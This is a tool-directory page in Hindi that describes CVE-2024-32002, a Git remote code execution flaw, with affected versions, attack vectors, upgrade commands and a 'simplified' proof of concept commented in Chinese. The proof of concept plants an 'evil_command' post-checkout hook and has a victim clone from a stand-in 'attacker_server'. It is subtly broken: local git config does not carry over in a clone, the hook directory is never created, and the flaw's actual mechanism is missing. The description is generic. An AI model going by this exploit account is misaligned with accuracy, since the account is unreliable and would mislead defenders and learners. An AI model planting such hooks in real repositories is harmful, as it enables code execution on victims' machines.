Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-32002-PoC_Chinese — कोई नहीं | Kitploit
उपकरण/GitHubGitHub/basyacatx/cve-2024-32002-poc_chinese
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHubbasyacatx/cve-2024-32002-poc_chinese

CVE-2024-32002-PoC_Chinese

कोई नहीं

रिपॉजिटरी देखें
22 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-32002 भेद्यता अवलोकन (⚠️चेतावनी!: कृपया इस रिपॉजिटरी को क्लोन न करें!!!⚠️)

विवरण

CVE-2024-32002 Git सॉफ़्टवेयर में पाई गई एक गंभीर सुरक्षा भेद्यता है। यह भेद्यता दूरस्थ हमलावरों को विशेष रूप से तैयार किए गए Git रिपॉजिटरी के माध्यम से प्रभावित सिस्टम पर मनमाना कोड निष्पादित करने की अनुमति देती है। यह भेद्यता Git द्वारा विशिष्ट रिपॉजिटरी संचालन को संसाधित करने की प्रक्रिया में मौजूद है, और इनपुट डेटा के अपर्याप्त सत्यापन के कारण, रिमोट कोड एक्ज़ीक्यूशन (RCE) का जोखिम उत्पन्न होता है।

प्रभाव

इस भेद्यता का सफलतापूर्वक दोहन करने से हो सकता है:

  • रिमोट कोड एक्ज़ीक्यूशन (RCE): हमलावर प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं।
  • सिस्टम नियंत्रण: हमलावर प्रभावित सिस्टम का पूर्ण नियंत्रण प्राप्त कर सकते हैं।
  • डेटा लीक और छेड़छाड़: संवेदनशील डेटा तक अनधिकृत पहुंच और संशोधन।
  • आगे के हमले: पीड़ित के नेटवर्क के अंदर आगे के हमले शुरू करना।

प्रभावित संस्करण

Git सॉफ़्टवेयर के निम्नलिखित संस्करण CVE-2024-32002 से प्रभावित हैं: Versions Default Status: unknown
affected at = 2.45.0
affected at = 2.44.0
affected at >= 2.43.0, < 2.43.4
affected at >= 2.42.0, < 2.42.2
affected at = 2.41.0
affected at >= 2.40.0, < 2.40.2
affected at < 2.39.4

भेद्यता विवरण

CVE-2024-32002 विस्तृत जानकारी भेद्यता Git द्वारा विशिष्ट रिपॉजिटरी संचालन को संसाधित करने की प्रक्रिया में मौजूद है। जब उपयोगकर्ता किसी दुर्भावनापूर्ण Git रिपॉजिटरी को क्लोन करता है या उसके साथ इंटरैक्ट करता है, तो हमलावर विशेष रूप से तैयार किए गए रिपॉजिटरी या कमिट इतिहास के माध्यम से दुर्भावनापूर्ण कोड इंजेक्ट कर सकते हैं। पर्याप्त इनपुट सत्यापन के अभाव के कारण, ये दुर्भावनापूर्ण कोड रिपॉजिटरी संचालन निष्पादित करते समय सुरक्षा जांचों को बायपास कर सकते हैं, जिससे मनमाना कोड निष्पादन हो सकता है।

हमले के वेक्टर

  1. दुर्भावनापूर्ण रिपॉजिटरी: हमलावर एक दुर्भावनापूर्ण Git रिपॉजिटरी बनाता है जिसमें विशेष रूप से तैयार किए गए कमिट इतिहास या फ़ाइलें होती हैं।
  2. सामाजिक इंजीनियरिंग: हमलावर पीड़ित को उस दुर्भावनापूर्ण रिपॉजिटरी को क्लोन करने या उसके साथ इंटरैक्ट करने के लिए प्रेरित करता है।
  3. कोड निष्पादन: जब पीड़ित कुछ Git ऑपरेशन (जैसे git clone, git pull) निष्पादित करता है, तो दुर्भावनापूर्ण कोड ट्रिगर होता है और निष्पादित होता है।

शमन उपाय

अपग्रेड करें

उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे Git सॉफ़्टवेयर के नवीनतम संस्करण में अपग्रेड करें जिसमें इस भेद्यता का पैच शामिल है। फिक्स संस्करण इस प्रकार हैं:

  • Git 2.45.1 और उच्चतर

अपग्रेड कमांड इस प्रकार हैं:

root@kitploit:~
# 对于 macOS
brew upgrade git

# 对于 Ubuntu/Debian
sudo apt-get update
sudo apt-get install git

# 对于 CentOS/RHEL
sudo yum update git

शोषण विधि

CVE-2024-32002 के लिए प्रूफ-ऑफ-कॉन्सेप्ट (PoC) सार्वजनिक रूप से उपलब्ध है। नीचे एक सरलीकृत PoC उदाहरण दिया गया है:

root@kitploit:~
# 攻击者创建恶意仓库
git init malicious-repo
cd malicious-repo
echo 'malicious content' > payload.txt
git add payload.txt
git commit -m "Add malicious payload"

# 通过注入恶意代码的提交历史触发漏洞
git config --local core.hooksPath .githooks
echo 'evil_command' > .githooks/post-checkout
git add .githooks
git commit -m "Add post-checkout hook"

# 受害者克隆恶意仓库时触发漏洞
git clone attacker_server/malicious-repo
टूल डाउनलोड करें